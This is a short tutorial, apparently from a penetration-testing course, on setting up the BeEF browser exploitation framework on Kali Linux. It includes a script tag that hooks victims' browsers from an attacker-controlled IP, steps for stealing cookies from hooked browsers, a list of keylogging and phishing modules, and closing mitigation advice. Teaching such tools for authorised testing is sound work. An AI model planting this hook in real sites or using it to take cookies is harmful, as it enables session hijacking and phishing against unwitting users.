BeEF (Browser Exploitation Framework) Setup & Demonstration

1. What is BeEF?

BeEF (Browser Exploitation Framework) is a penetration testing tool that targets web browsers. It allows security professionals to exploit vulnerabilities in web browsers and gain control over a compromised system through hooked browsers.

2. Setting Up BeEF on Kali Linux

Step 1: Install BeEF

BeEF comes pre-installed in Kali Linux. If missing, install it manually:

sudo apt update && sudo apt install beef-xss

Step 2: Start BeEF

Launch BeEF by running:

sudo beef-xss

After starting, you should see an output like:

[*] Starting BeEF...
[*] Running on http://127.0.0.1:3000/ui/panel

Step 3: Access the BeEF Web Interface

Open a browser and navigate to:

http://127.0.0.1:3000/ui/panel

  • Default credentials:

    • Username: beef

    • Password: beef

3. Hooking a Target Browser

To compromise a browser, inject the BeEF Hook JavaScript into a vulnerable website:

<script src="http://your-ip:3000/hook.js"></script>

  • Replace your-ip with your attacker machine’s IP.

  • When a victim loads the page, their browser becomes hooked and appears in BeEF’s control panel.

4. Exploiting a Hooked Browser

Once a browser is hooked, BeEF provides various exploitation modules, including:

Stealing Cookies & Session Data Capturing Keystrokes Injecting Fake Login Pages (Phishing) Manipulating Web Pages in Real Time Exploiting Browser Vulnerabilities (e.g., outdated extensions)

Example: Grab Cookies from a Hooked Browser

  1. Navigate to Commands > Browser > Get Cookies.

  2. Click Execute on the hooked browser.

  3. Captured cookies appear in the output.

5. Mitigation Strategies

To protect against BeEF attacks, users should:

Keep Browsers & Extensions Updated Use Content Security Policy (CSP) to prevent malicious scripts Enable HTTP Security Headers (e.g., X-XSS-Protection) Block JavaScript Execution for Untrusted Sites Use Anti-Phishing Extensions & Browser Security Plugins

PreviousMan-in-the-Middle (MITM) Attack